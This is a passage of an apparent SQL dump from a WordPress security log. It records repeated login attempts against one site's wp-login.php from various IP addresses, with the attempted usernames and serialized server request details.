Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43812\";s:11:\"REMOTE_ADDR\";s:11:\"66.29.132.7\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746045587.1889;s:12:\"REQUEST_TIME\";i:1746045587;}}','66.29.132.7',0,'2025-05-01 02:09:49','1970-01-01 00:00:00'),(94625,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39278\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746045895.6997869;s:12:\"REQUEST_TIME\";i:1746045895;}}','103.169.35.190',0,'2025-05-01 02:14:57','1970-01-01 00:00:00'),(94626,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43996\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746046224.7829189;s:12:\"REQUEST_TIME\";i:1746046224;}}','198.54.125.232',0,'2025-05-01 02:20:26','1970-01-01 00:00:00'),(94627,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39170\";s:11:\"REMOTE_ADDR\";s:14:\"103.186.185.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746046532.4320941;s:12:\"REQUEST_TIME\";i:1746046532;}}','103.186.185.28',0,'2025-05-01 02:25:34','1970-01-01 00:00:00'),(94628,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34964\";s:11:\"REMOTE_ADDR\";s:12:\"51.178.45.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746046846.337604;s:12:\"REQUEST_TIME\";i:1746046846;}}','51.178.45.73',0,'2025-05-01 02:30:48','1970-01-01 00:00:00'),(94629,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33742\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746047183.700563;s:12:\"REQUEST_TIME\";i:1746047183;}}','192.64.117.71',0,'2025-05-01 02:36:25','1970-01-01 00:00:00'),(94630,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57760\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746047495.440594;s:12:\"REQUEST_TIME\";i:1746047495;}}','94.23.61.165',0,'2025-05-01 02:41:37','1970-01-01 00:00:00'),(94631,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53096\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746047821.350436;s:12:\"REQUEST_TIME\";i:1746047821;}}','103.169.35.190',0,'2025-05-01 02:47:03','1970-01-01 00:00:00'),(94632,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52330\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.123.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048136.5679491;s:12:\"REQUEST_TIME\";i:1746048136;}}','68.65.123.234',0,'2025-05-01 02:52:18','1970-01-01 00:00:00'),(94633,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65087\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048327.4734011;s:12:\"REQUEST_TIME\";i:1746048327;}}','196.251.112.104',1,'2025-05-01 02:55:29','2025-05-01 03:14:50'),(94634,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65084\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048327.468241;s:12:\"REQUEST_TIME\";i:1746048327;}}','196.251.112.104',1,'2025-05-01 02:55:29','2025-05-01 03:14:50'),(94635,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 